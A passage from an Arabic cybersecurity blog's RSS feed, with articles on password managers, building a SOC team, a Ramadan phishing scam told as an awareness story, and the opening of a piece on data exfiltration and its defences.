&lt;li&gt;سمعة جيدة وتحديثات منتظمة، ويُفضَّل مفتوح المصدر أو خضع لمراجعات أمنية مستقلة.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;كيف-تبدأ-باستخدامه-خلال-يوم-واحد&quot;&gt;كيف تبدأ باستخدامه خلال يوم واحد؟&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;ثبّت الأداة على الحاسوب والهاتف وأنشئ كلمة رئيسية طويلة، عبارة من عدة كلمات أفضل من كلمة معقدة قصيرة.&lt;/li&gt;
&lt;li&gt;فعّل المصادقة الثنائية على الخزنة.&lt;/li&gt;
&lt;li&gt;ابدأ بالحسابات المهمة: البريد الإلكتروني أولاً، ثم البنوك، ثم حسابات التواصل.&lt;/li&gt;
&lt;li&gt;غيّر كلمة المرور في كل حساب إلى كلمة عشوائية يولّدها المدير، ولا تحاول حفظها.&lt;/li&gt;
&lt;li&gt;احتفظ بنسخة احتياطية من مفتاح الاسترداد في مكان آمن بعيد عن الجهاز.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;وللمزيد من العادات اليومية الأساسية راجع &lt;a href=&quot;https://blog.cyberpedia.site/back-to-school-and-cybersecurity/&quot;&gt;نصائح الأمن السيبراني للعودة إلى المدارس&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;مدير كلمات المرور لا يلغي الحاجة إلى الحذر، لكنه يزيل أضعف حلقة في معظم الحسابات: كلمة مرور ضعيفة أو مكررة. اجعل البريد الإلكتروني أول حساب تنقله إليه، فهو بوابة استعادة كل الحسابات الأخرى.&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>كلمات المرور</category><category>مدير كلمات المرور</category><category>Password Manager</category><category>المصادقة الثنائية</category><category>السلامة الرقمية</category></item><item><title>كيف تبني فريق SOC قوي</title><link>https://blog.cyberpedia.site/security-operations-center/</link><guid isPermaLink="true">https://blog.cyberpedia.site/security-operations-center/</guid><description>المكونات الثلاثة لبناء مركز عمليات أمن سيبراني SOC فعّال: الأشخاص والعمليات والتكنولوجيا، مع مستويات المحللين Tier 1 إلى Tier 3 ودور الإدارة.</description><pubDate>Sun, 23 Mar 2025 12:02:23 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يقوم فريق SOC القوي على ثلاثة مكونات متكاملة: الأشخاص المؤهلون وهم القلب النابض، والعمليات التي تحدد مهام كل عضو، والتكنولوجيا التي تمكّن المحلل ولا تحل محله. يُنظَّم الفريق في مستويات من Tier 1 لفرز التنبيهات إلى Tier 2 وTier 3 للتحليل المتقدم، وتحميه الإدارة من التشتيت.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;الحقيقة التي لا يمكن إخفائها أو التغاضي عنها هي أن الهجمات السيبرانية ستحدث لا محالة ولا يوجد نظام آمن بشكل مطلق والنظام الذي يبدو محمياً اليوم سيكون معرض للخطر غداً.
&lt;strong&gt;لكن ماذا لو كان لديك فريق مجهز بالكامل لمواجهة هذه التهديدات؟&lt;/strong&gt; فريق يعمل بتنسيق مثالي ويدير الأدوات والعمليات والقرارات بسرعة ودقة لصد الهجمات بشكل فعال، ما الذي يجعل هذا الفريق قادراً على الحفاظ على أمان منظمتك رغم كل المخاطر؟
الجواب يكمن في &lt;strong&gt;ثلاث مكونات أساسية&lt;/strong&gt;، إذا تم تنسيقها بشكل صحيح، تصبح خط دفاع فعال يحميك من أي تهديد. فما هي هذه المكونات التي تجعل فريقك لا يُقهر؟
تابع القراءة لاكتشاف استراتيجات بناء فريق عمليات أمن سيبراني SOC فعال ولتتعرف على مكونات هذا الفريق: “الأشخاص”، “العمليات”، و”التكنولوجيا” ودور كل منها في الحماية الفعالة والتعامل مع التهديدات المستمرة.&lt;/p&gt;
&lt;p&gt;ما الذي يجعل مركز عمليات الأمن السيبراني SOC ناجحاً بالفعل؟ الإجابة تكمن في &lt;strong&gt;ثلاثة مكونات أساسية&lt;/strong&gt; تُعرف بمفهوم “ثلاثي النجاح” أو &lt;strong&gt;People, Process, and Technology&lt;/strong&gt; — الأشخاص والعمليات والتكنولوجيا.
هذه العناصر تمثل “مقعد ثلاثي الأرجل” ولا يمكن أن يعمل مركز SOC أو ينجح بدون أحدها&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مركز SOC كمقعد بثلاث أرجل: الأشخاص والعمليات والتكنولوجيا، ولا ينجح المركز بدون أحدها&quot; width=&quot;1600&quot; height=&quot;992&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.Bo-on5l8_ZMftEY.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;أولاً-الأشخاص--القلب-النابض-والركيزة-الأساسية&quot;&gt;أولاً: الأشخاص – القلب النابض والركيزة الأساسية&lt;/h2&gt;
&lt;p&gt;لا يمكن لأي فريق أزرق أن ينجح بدون عنصر بشري مؤهل يمتلك المهارات اللازمة لأداء المهام والتفاعل بفعالية مع العمليات والأدوات، فالعنصر البشري هو قلب وروح الفريق الأزرق ولا يمكن تعويضه بأي تقنية أو إجراء إداري.&lt;/p&gt;
&lt;p&gt;عملية اختيار الأشخاص تُعد من أهم خطوات بناء الفريق ويجب أن يكون الأفراد قادرين على العمل تحت الضغط ويتمتعون بذكاء عالي ومهارات تواصل قوية مع عقلية تطور مستمر.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;الجودة هنا تتفوق على الكمية — فوجود شخص واحد يتمتع بالدافعية والمعرفة يمكنه أن يُحدث فرقاً كبيراً في الفريق.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id=&quot;المحلل-على-شكل-حرف-t&quot;&gt;المحلل على شكل حرف “T”&lt;/h3&gt;
&lt;p&gt;المحلل المثالي هو من يُعرف بـ”الشخص على شكل حرف T”، كما ورد في كتاب &lt;strong&gt;&lt;a href=&quot;https://www.amazon.com/Strategies-World-Class-Cybersecurity-Operations-Center/dp/0692243100&quot;&gt;Ten Strategies of a World-Class Cybersecurity Operations Center&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;وهو الشخص الذي:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;يمتلك معرفة عامة واسعة في مجال تكنولوجيا المعلومات.&lt;/li&gt;
&lt;li&gt;لديه القدرة على التخصص والتعمق في مجال تقني معين مثل التحليل الجنائي الرقمي أو هندسة البرمجيات الخبيثة.&lt;/li&gt;
&lt;li&gt;يمكنه كتابة الأكواد وقراءة وتحليل البرمجيات وإعداد تقارير تحليلية مفصلة.&lt;/li&gt;
&lt;li&gt;يملك طاقة إيجابية تحفّز باقي الفريق، فـ&lt;strong&gt;الموهبة تجذب المواهب&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;منصة-cyberpedia-التعليمية&quot;&gt;&lt;a href=&quot;https://platform.cyberpedia.site/&quot;&gt;منصة Cyberpedia التعليمية&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;انطلاقاً من أهمية العنصر البشري، نعمل في منصة Cyberpedia التعليمة على &lt;strong&gt;تدريب وتأهيل الكفاءات عبر المعسكرات الاحترافية المتخصصة&lt;/strong&gt;
هدفنا هو بناء قاعدة قوية من المحللين والمختصين العرب القادرين على قيادة مراكز العمليات الأمنية SOC باحترافية والمساهمة الفعالة في أمن الفضاء السيبراني العربي.&lt;/p&gt;
&lt;h2 id=&quot;ثانياً-العمليات--خارطة-الطريق-لكل-عضو-في-الفريق&quot;&gt;ثانياً: العمليات – خارطة الطريق لكل عضو في الفريق&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;العمليات داخل مركز SOC تحدد المهام اليومية لكل عضو بالفريق:&lt;/strong&gt; ماذا يفعل؟ كيف؟ ومتى؟
تشمل العمليات كل ما يتعلق بالاستجابة للحوادث والتحليل الجنائي و التعامل مع التنبيهات و إدارة التهديدات والتوثيق.&lt;/p&gt;
&lt;p&gt;في المؤسسات الكبيرة، يمكن تخصيص أدوار معينة مثل جمع معلومات التهديدات (Threat Intelligence) أو الهندسة العكسية للبرمجيات الخبيثة لمتخصصين، أما في المؤسسات الصغيرة فيكون من الضروري أن يتحلى الأفراد بالمرونة لتبديل “القبعات” بحسب الحاجة.&lt;/p&gt;
&lt;h3 id=&quot;دور-الإدارة&quot;&gt;دور الإدارة&lt;/h3&gt;
&lt;p&gt;مدراء مركز SOC لا يقتصر دورهم على الإشراف الإداري فقط، بل يعملون كـ “جدار حماية ثنائي الاتجاه”:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;يمنعون تشتيت الفريق بالطلبات العشوائية من الإدارة العليا.&lt;/li&gt;
&lt;li&gt;ينقلون النجاحات والمشاكل المهمة للقيادة بطريقة مختصرة وفعالة.&lt;/li&gt;
&lt;li&gt;يساعدون على تحديد الأهداف وضمان استمرار تركيز الفريق على المهام ذات الأولوية.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;ثالثاً-التكنولوجيا--المُمكِّن-لا-البديل&quot;&gt;ثالثاً: التكنولوجيا – المُمكِّن لا البديل&lt;/h2&gt;
&lt;p&gt;التكنولوجيا في مركز SOC لا تُعتبر بديلاً عن المحلل البشري، بل أداة تمكّنه وتُحسّن من أدائه.
من أنظمة كشف الاختراق (IDS)، إلى أنظمة إدارة التنبيهات، إلى أدوات التحليل الجنائي الرقمي — التكنولوجيا تسمح لنا بالتعامل مع كميات هائلة من البيانات وتحليلها بكفاءة ولكن، إذا كانت الأدوات قادرة على استبدال المحلل، فغالباً ما يعني أن دوره كان روتينياً ويمكن أتمتته، وظيفة المحلل الأساسية هي التحليل، التفكير، واتخاذ القرار — وهي مهام لا تُنفذها الأدوات&lt;/p&gt;
&lt;h2 id=&quot;تنظيم-فريق-soc-الأدوار-المستويات-والمسؤوليات&quot;&gt;تنظيم فريق SOC: الأدوار، المستويات، والمسؤوليات&lt;/h2&gt;
&lt;p&gt;يتم تنظيم فرق SOC عادةً ضمن هيكل هرمي يتضمن ثلاثة مستويات رئيسية:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;المستوى الأول (Tier 1):&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;مخصص للمبتدئين، يشمل فرز التنبيهات، جمع البيانات الأولية، وتقديم التقارير الأولية وفي هذا المستوى تكون أدوات الوصول محدودة وذلك لضمان السيطرة على العمليات وتقليل الأخطاء.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;المستوى الثاني والثالث (Tier 2 و Tier 3):&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;مع اكتساب المحللين الخبرة والمعرفة يتم ترقيتهم للمستويات الأعلى حيث يُتاح لهم التعامل مع مهام تحليلية أكثر تعقيداً، مثل:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;التحليل الجنائي للذاكرة.&lt;/li&gt;
&lt;li&gt;الهندسة العكسية للبرمجيات الخبيثة.&lt;/li&gt;
&lt;li&gt;التفاعل المباشر مع التهديدات المتقدمة.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;هذا التسلسل يضمن تطوير مهارات الأفراد وتحفيزهم للاستمرار في العمل والتقدم داخل الفريق&lt;/p&gt;
&lt;h2 id=&quot;فهم-الأدوات-والبيئة-التشغيلية&quot;&gt;فهم الأدوات والبيئة التشغيلية&lt;/h2&gt;
&lt;p&gt;أحد أهم التحديات التي يواجهها المحللون الجدد في مراكز العمليات الأمنية SOC هو فهم العلاقة بين الأدوات المختلفة، لذلك نبدأ دائماً بشرح كل نظام بشكل مبسط ومجرد.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;مثال: نظام كشف الاختراق (IDS)&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;المدخلات&lt;/strong&gt;: حركة البيانات في الشبكة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المعالجة&lt;/strong&gt;: مقارنة مع أنماط وتوقيعات معروفة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المخرجات&lt;/strong&gt;: تنبيهات تُعرض على الفريق الأمني.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;بمجرد أن نفهم وظيفة كل نظام على حدة، يصبح من السهل إعادة تركيب المشهد الكامل لفهم بيئة SOC بشكل شمولي&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;بناء مركز عمليات أمن سيبراني SOC ناجح يبدأ من الداخل&lt;/strong&gt; والنجاح في بناء مركز عمليات أمنية لا يعتمد فقط على التكنولوجيا المتقدمة، بل على التكامل الحقيقي بين الأشخاص المدربين والعمليات الواضحة والأدوات الفعالة.&lt;/p&gt;
&lt;p&gt;إذا كنت تتطلع لبناء أو قيادة فريق SOC احترافي، فابدأ من الأساس: ابنِ الفريق، نظّم العمليات، واختر الأدوات بعناية و&lt;strong&gt;إذا كنت تريد التعرف على استراتيجيات بناء فرق SOC فعالة أو كنت ترغب الحصول على عمل في مجال الأمن السيبراني في الفريق الأزرق فأنصحك بالاستعداد للإنضمام&lt;/strong&gt; &lt;a href=&quot;https://platform.cyberpedia.site/courses/blue-team-bootcamp/&quot;&gt;&lt;strong&gt;لمعسكر الفريق الأزرق&lt;/strong&gt;&lt;/a&gt; الذي سيتم الإعلان عنه قريباً ضمن منصة &lt;strong&gt;Cyberpedia التعليمية&lt;/strong&gt; المعسكر الأول من نوعه على مستوى الوطن العربي لفهم الأدوات والخطط وأفضل الممارسات العملية لبناء فريق SOC قادر على التعامل مع الهجمات والتهديدات الأمنية المستمرة.&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>SOC</category><category>مركز عمليات الأمن</category><category>الفريق الأزرق</category><category>محلل SOC</category><category>الاستجابة للحوادث</category></item><item><title>كيف يتم اختراقك في شهر رمضان؟</title><link>https://blog.cyberpedia.site/phishing-in-ramadan/</link><guid isPermaLink="true">https://blog.cyberpedia.site/phishing-in-ramadan/</guid><description>قصة واقعية لعملية تصيد احتيالي تستغل دعماً رمضانياً مزيفاً لسرقة بياناتك خطوة بخطوة، مع أبرز مخاطر التصيد وأهم خطوات الحماية منه.</description><pubDate>Thu, 20 Mar 2025 10:12:48 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;التصيد الاحتيالي فخ مدروس يستهدف ثقتك قبل بياناتك عبر بريد أو رسالة أو مكالمة. يوضح المقال عبر قصة نبيه كيف يستدرج المحتالون الضحية بدعم رمضاني مزيف وتعليقات مفبركة ونموذج لجمع البيانات وطلب مشاركة الرابط، ثم يحذر من مخاطر مثل سرقة الهوية والابتزاز والبرمجيات الخبيثة، وينصح بالتحقق من المصدر وعدم النقر على الروابط المشبوهة وتجنب العروض المغرية.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في أعماق محيط شبكة الإنترنت، لا نحتاج إلى شبكة لصيد الضحايا، بل يكفي بريد إلكتروني عاجل أو رسالة نصيّة مغرية أو حتى مكالمة هاتفية مقلقة، خلف تلك الواجهة البريئة يكمن خطر عظيم يستهدف ثقتك قبل بياناتك ومعلوماتك الشخصية، هذا الهجوم الذي يصعب تمييزه في كثير من الأحيان، يتسلل إلى حياتك الرقمية دون أن تشعر، ليس مجرد خدعة إلكترونية بل هو فخ يستهدفك بشكلٍ مدروس.&lt;/p&gt;
&lt;p&gt;إنه &lt;strong&gt;التصيد الاحتيالي&lt;/strong&gt;…فن خداع المستخدمين!.&lt;/p&gt;
&lt;h2 id=&quot;مثال-من-الواقع&quot;&gt;مثال من الواقع&lt;/h2&gt;
&lt;p&gt;لم يكن &lt;strong&gt;نبيه&lt;/strong&gt; (موظف متواضع يعمل في إحدى المؤسسات التابعة لوزارة الصناعة وأب لخمسة أطفال) يتوقع أن مجرد نقرة واحدة قد تغيّر يومه بالكامل..&lt;/p&gt;
&lt;p&gt;بدأت القصة عندما تلقى صديقنا رسالة إلكترونية من أحد معارفه “مرحباً، لقد استفاد صديقك “فلان” صاحب الرقم ………09 من الدعم الذي تقدمه وزارة الأوقاف وذلك بمناسبة شهر رمضان المبارك والذي تبلغ قيمته 330 دولار، يمكنك الحصول على الدعم من خلال زيارة الرابط التالي ………………………..”.&lt;/p&gt;
&lt;p&gt;– مبلغ رائع!، أخييراً سأتمكن من سداد بعض الديون وشراء ملابس العيد لزوجتي وأطفالي ودفع فاتورة الكهرباء، أيضاً صاحب المنزل سأتخلص من ملاحقته لي لشهرين كاملين و….و…..&lt;/p&gt;
&lt;p&gt;بدأ نبيه يبني آمالاً وتطلعات فارغة والابتسامة تملأ وجهه وقرر زيارة الرابط المرفق بالرسالة…&lt;/p&gt;
&lt;h2 id=&quot;رحلة-نبيه-في-الحصول-على-الدعم&quot;&gt;رحلة نبيه في الحصول على الدعم..&lt;/h2&gt;
&lt;p&gt;ما رأيكم أن نذهب مع نبيه في هذه الرحلة ونرى ما هي الخطوات التي سيتبعها ليظفر بالدعم المالي؟ ونحن بدورنا سنتبع نفس الخطوات لكي نستفيد نحن أيضاً……&lt;/p&gt;
&lt;p&gt;يستعرض صديقنا الصفحة الأولى لموقع وزارة الأوقاف ويقوم بقراءة التعليقات..&lt;/p&gt;
&lt;p&gt;– لماذا تغيرت قيمة المبلغ!، لقد قالوا في البداية أن الدعم سيكون بعملة الدولار وليس الليرة!، لا بأس سأتابع..&lt;/p&gt;
&lt;p&gt;– يبدو أن الأمر حقيقي فعلاً، فهؤلاء الأشخاص قد استفادوا، أنا متحمس..&lt;/p&gt;
&lt;p&gt;وقام بالضغط على الزر التالي “اضغط هنا للتسجيل”!.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;منشور تصيد مزيف ينتحل اسم وزارة الأوقاف ويعرض دعماً رمضانياً بقيمة 650000 ليرة مع زر «اضغط هنا للتسجيل» وأرقام تفاعل ضخمة لإيهام الضحية بمصداقيته&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.Pq6cbuea_Z22YNYY.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;تعليقات مفبركة أسفل المنشور المزيف: مستخدمون يؤكدون استلامهم المبلغ وردود باسم وزارة الأوقاف، لصناعة دليل اجتماعي كاذب يدفع الضحية للثقة&quot; width=&quot;1600&quot; height=&quot;993&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.DGJt-a7p_2fMXOd.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;في الصفحة التالية كانت تنتظره مصيدة تقوم بابتلاع البيانات التي سيدخلها…&lt;/p&gt;
&lt;p&gt;– يريدون رقم هاتفي لكي يتصلوا بي ويخبروني بآلية استلام المبلغ، سأقوم بتزويدهم بجميع المعلومات المطلوبة.&lt;/p&gt;
&lt;p&gt;لقد أكمل نبيه تعبئة بياناته ثم قام بالنقر على “التحقق”.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;نموذج مزيف بعنوان «قم بإدخال معلوماتك الشخصية» يطلب الاسم الكامل ورقم الهاتف وعدد الأفراد وقد ملأه الضحية ببياناته قبل الضغط على «التحقق»&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.C1oWqgVc_Z1qbpUo.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;في أثناء رحلتنا ومتابعتنا لما يقوم به نبيه عندما قرأنا العبارة التالية “جاري التحقق من المعلومات…” استنكرنا هذه المرحلة؛ من أية معلومات يتم التحقق بالضبط؟! وماهي الآلية المتبعة في ذلك؟&lt;/p&gt;
&lt;p&gt;– أخيراً، وصلتُ إلى الخطوة الأخيرة، إنه مبلغ ممتاز، يجب أن أكمل الشرط الأخير بسرعة.&lt;/p&gt;
&lt;p&gt;قام بإرسال الرابط إلى جميع أصدقائه وطلب منهم زيارته ليستفيدوا أيضاً!، ثم نقر على “مساهمة”.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;شاشة وهمية تعرض «جاري التحقق من المعلومات…» مع شريط تقدم عند 50% لإيهام الضحية بوجود عملية تحقق حقيقية&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-05.CkdOZ_XQ_Z2bwvUl.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;رسالة ترحيب باسم الضحية تعلن دعماً بقيمة 4550000 ليرة بشرط الضغط على «مساهمة» ونشر الرابط إلى 15 صديقاً أو 5 مجموعات على واتساب حتى يظهر كود السحب&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-06.CV0Qhgy2_gTdQ5.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;+ توقف يا نبيه كود ماذا وأي سحب يتحدثون عنه غادر هذا الموقع بسرعة لا يوجد كود ولا دعم مالي..&lt;/p&gt;
&lt;p&gt;أجبرنا نبيه بمغادرة هذا الموقع فاقتنع بصعوبة لكن المفاجأة كانت عند ظهور هذه الرسالة والتي أعادت الإصرار لنبيه في متابعة هذا الأمر حتى النهاية…&lt;/p&gt;
&lt;p&gt;– سأضغط على الزر الأخير وأستعرض الكود.&lt;/p&gt;
&lt;p&gt;طبعاً لم يكن هناك كود، بل تم توجيهه إلى موقع آخر خبيث لاستكمال عملية النصب والاحتيال التي وقع في شباكها.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;شاشة نجاح مزيفة تقول «يمكنك الآن الحصول على كود السحب» مع زر «اضغط هنا لعرض الكود» الذي يوجّه الضحية إلى موقع خبيث آخر&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-08.CHqw2oH4_dVr3z.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;نافذة ضغط نفسي تظهر «خطأ! لم يتبق لك سوى خطوة واحدة للحصول على الدعم، أكملها وإلا ستفقد فرصة الحصول عليه» لدفع الضحية إلى الاستمرار&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-09.Bd4wQt3q_Z1xwJQh.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;مخاطر-التصيد-الاحتيالي&quot;&gt;مخاطر التصيد الاحتيالي&lt;/h2&gt;
&lt;p&gt;بكل تأكيد إن نبيه تعرض لعملية تصيد احتيالي مدروسة وموجهة لسرقة بياناته، لكن احتمالات هذا الهجوم كثيرة وواردة أهمها:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;سرقة البيانات الشخصية:&lt;/strong&gt; يمكن للمحتالين سرقة معلوماتك الشخصية مثل اسمك، عنوانك، تاريخ ميلادك، وأرقام حساباتك البنكية أو بطاقات الائتمان.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تدمير السمعة الشخصية:&lt;/strong&gt; قد يُستخدم التصيد الاحتيالي لنشر معلومات كاذبة أو تشويه سمعتك على الإنترنت عبر حساباتك الشخصية أو المهنية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التعرض للابتزاز:&lt;/strong&gt; في بعض الحالات، قد يحصل المحتالون على صور أو مستندات حساسة بعد أن يظن الضحايا أنهم يتعاملون مع جهة موثوقة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تحميل البرمجيات الخبيثة (فيروسات، برامج تجسس):&lt;/strong&gt; في كثير من الحالات، يتضمن التصيد الاحتيالي روابط أو مرفقات تحتوي على برامج ضارة مثل الفيروسات أو برامج التجسس.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;فقدان الوصول إلى البيانات المهمة:&lt;/strong&gt; من خلال التصيد الاحتيالي، قد تتمكن البرمجيات الضارة من الوصول إلى بياناتك الهامة مثل المستندات أو كلمات المرور.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تأثير سلبي على الأعمال التجارية:&lt;/strong&gt; إذا كانت ضحية التصيد الاحتيالي هي شركة أو منظمة، فقد يتم الوصول إلى حسابات الشركات أو المعلومات الحساسة.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-نحمي-أنفسنا-من-أن-تكون-ضحية-للتصيد-الاحتيالي&quot;&gt;كيف نحمي أنفسنا من أن تكون ضحية للتصيد الاحتيالي؟&lt;/h2&gt;
&lt;p&gt;تُعلمنا قصة نبيه أن نتريث دائماً ونتعامل بحذر ووعي شديدين في كل أمر من أمور حياتنا سواء كانت الواقعية أو الرقمية بالإضافة إلى إجراءات وقائية إضافية:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;التحقق من مصدر الرسائل:&lt;/strong&gt; تأكد دائماً من مصدر الرسالة أو البريد الإلكتروني قبل التفاعل معه.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;توخي الحذر عند النقر على الروابط:&lt;/strong&gt; لا تقم بالنقر على الروابط المرفقة في رسائل البريد الإلكتروني أو الرسائل غير المتوقعة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;توخي الحذر من العروض المغرية:&lt;/strong&gt; تجنب الرسائل التي تعرض عروضاً مغرية مثل جوائز أو فرص عمل غير واقعية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;احذر من الاتصالات الهاتفية غير المتوقعة:&lt;/strong&gt; التصيد الاحتيالي قد لا يقتصر على البريد الإلكتروني فقط، فقد يحاول المهاجمون الاتصال بك عبر الهاتف.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التحقق من صفحات الإنترنت والبريد الإلكتروني:&lt;/strong&gt; قم بالتحقق من صحة مواقع الويب الرسمية قبل إدخال أي معلومات حساسة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التدريب والتوعية المستمرة:&lt;/strong&gt; اجعل من تعلم أساليب التصيد الاحتيالي جزءاً من روتين الأمان الرقمي لديك، فالتوعية والتدريب يلعبان دوراً كبيراً في تجنب هذه الهجمات.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;تبقى الحماية من التصيد الاحتيالي مسؤولية فردية وجماعية، قد تبدو الرسائل المغرية والعروض الفائقة حقيقية، لكن وراء كل تلك الواجهات البريئة يمكن أن يختبئ تهديد كبير يهدد بياناتك وحياتك الرقمية، كما رأينا في قصة نبيه، يمكن أن تقع بسهولة ضحية لتلك الحيل إذا لم تكن حذراً، لكن مع الوعي المستمر وتطبيق خطوات الوقاية المناسبة، يمكننا جميعاً تجنب الوقوع في فخ هذه الهجمات الرقمية، حافظ على وعيك الرقمي، تحقق من كل رابط، وكن دائماً في حالة استعداد لمواجهة هذه التهديدات المتجددة.&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>التصيد الاحتيالي</category><category>الاحتيال الرقمي</category><category>رمضان</category><category>الهندسة الاجتماعية</category><category>حماية البيانات</category></item><item><title>سرقة البيانات: تكتيك خطير في الهجمات السيبرانية</title><link>https://blog.cyberpedia.site/data-exfiltration/</link><guid isPermaLink="true">https://blog.cyberpedia.site/data-exfiltration/</guid><description>كيف يسرّب المهاجمون البيانات من الشبكات المحمية خطوة بخطوة، وكيف يتجاوزون جدران الحماية عبر المنافذ المسموحة والخدمات السحابية، وما الدفاعات التي توقفهم.</description><pubDate>Tue, 18 Mar 2025 10:49:28 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;تسريب البيانات (Data Exfiltration) هو إخراج المهاجم للبيانات الحساسة من الشبكة دون أن تكتشفه أنظمة الحماية: يسيطر على جهاز، ويجمع البيانات ويضغطها ويشفرها، ثم يرسلها ببطء عبر منافذ مسموحة مثل 80 و443 أو عبر خدمات سحابية. تتصدى المؤسسات له بمراقبة حركة البيانات وأنظمة IDS وDLP وتقييد الوصول.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تعتبر سرقة البيانات Data Exfiltration واحدة من أخطر المراحل في عمليات الاختراق، حيث يسعى المهاجم للوصول إلى معلومات حساسة دون إثارة الشبهات وغالباً ما تكون البيانات المستهدفة عبارة عن قواعد بيانات ضخمة تحتوي على معلومات سرية، مثل بيانات العملاء وأسرار الشركات والملفات الحساسة للحكومات والمؤسسات الكبرى، عملية استخراج هذه البيانات دون اكتشافها ليست سهلة، إذ تتطلب استراتيجيات متقدمة وتقنيات معقدة للتحايل على أنظمة الحماية المختلفة.&lt;/p&gt;
&lt;p&gt;يحتاج المهاجم إلى تنفيذ هذه العملية بأسلوب مخفي تماماً، حيث لا تقتصر العقبات على أنظمة الحماية مثل جدران الحماية (Firewalls) وأنظمة كشف الاختراق (IDS)، بل تشمل أيضاً سياسات الأمن السيبراني الصارمة التي تطبقها المؤسسات ومن هنا، يصبح الهدف الأساسي هو نقل البيانات عبر الشبكة بطريقة لا يتم اكتشافها، مما يتطلب أساليب مخادعة وتحليل دقيق للبنية التحتية الأمنية للمؤسسة المستهدفة.&lt;/p&gt;
&lt;p&gt;في هذا المقال، سنستعرض كيف يتم تنفيذ عمليات سرقة البيانات والأساليب التي يستخدمها المهاجمون لتجاوز أنظمة الحماية، بالإضافة إلى بعض الحلول الدفاعية الممكنة لحماية المؤسسات من هذا النوع من الهجمات.&lt;/p&gt;
&lt;h2 id=&quot;كيف-تتم-عملية-تسريب-البيانات&quot;&gt;كيف تتم عملية تسريب البيانات؟&lt;/h2&gt;
&lt;p&gt;في معظم عمليات الاختراق، يكون الهدف الأساسي هو سرقة قواعد البيانات الضخمة التي تحتوي على المعلومات المهمة ولكن هذا الأمر لا يتم بسهولة وسيواجه المهاجم التحدي التالي:&lt;/p&gt;
&lt;blockquote&gt;
